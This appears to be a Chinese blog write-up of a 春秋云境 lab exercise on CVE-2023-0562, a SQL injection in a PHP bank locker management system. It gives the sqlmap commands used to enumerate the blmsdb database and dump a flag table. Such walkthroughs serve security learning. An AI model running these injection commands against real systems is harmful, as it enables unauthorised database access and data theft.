春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
wuxuand2 小时前
网络安全-恶意流量检测评估指标-混淆矩阵
网络·安全
聆风吟º2 小时前
金仓数据库 SQL 防火墙:内核级防护,筑牢 SQL 注入安全防线
数据库·sql·安全·金仓·kingbasees
紫金桥软件2 小时前
紫金桥国产组态软件SCADA——筑牢水利数字化安全防线
安全·scada·组态软件·国产工业软件·监控组态软件
irpywp2 小时前
OpenShell:安全沙箱隔离的沙箱隔离技术
人工智能·安全
wal131452010 小时前
OpenClaw教程(九)—— 彻底告别!OpenClaw 卸载不残留指南
前端·网络·人工智能·chrome·安全·openclaw
无忧智库12 小时前
从《数据安全法》到全域治理:构建数字时代的安全新基石(PPT)
安全
二进喵12 小时前
关于OpenClaw安全使用指南
安全
谪星·阿凯12 小时前
XSS漏洞解析博客
前端·web安全·xss
数据库安全13 小时前
用AI重新定义数据安全监测,让数据安全变简单
人工智能·安全·数据安全
zzh08113 小时前
nginx安全笔记
笔记·nginx·安全